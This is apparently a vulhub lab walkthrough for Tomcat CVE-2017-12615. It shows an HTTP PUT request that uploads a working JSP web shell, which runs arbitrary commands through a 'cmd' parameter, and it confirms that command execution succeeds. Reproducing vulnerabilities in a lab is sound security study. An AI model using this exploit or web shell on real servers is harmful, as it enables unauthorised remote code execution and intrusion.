Environment setup:
Change to the corresponding vulhub directory
docker-compose build
docker-compose up -d
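Cause of the vulnerability
This is a Tomcat configuration problem: the server is configured as writable (readonly=false), which allows us to write files to the server.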
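Visit the deployed lab environment; the lab has been set up successfully.
Capture the request with Burp and send it to the Repeater module.
Modify the request as follows: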
PUT /3.jsp/ HTTP/1.1
Host: 192.168.253.168:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=D8D5F04F5570AE020EF1C31927F37AD3
Upgrade-Insecure-Requests: 1

<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));//jie's
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
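Send the modified request. As shown in the figure above, the upload succeeded.
Access the uploaded shell script in a browser and pass in a parameter. The command executes and returns the corresponding result.
References:
- http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html
- https://github.com/vulhub/vulhub/blob/master/tomcat/CVE-2017-12615/README.zh-cn.md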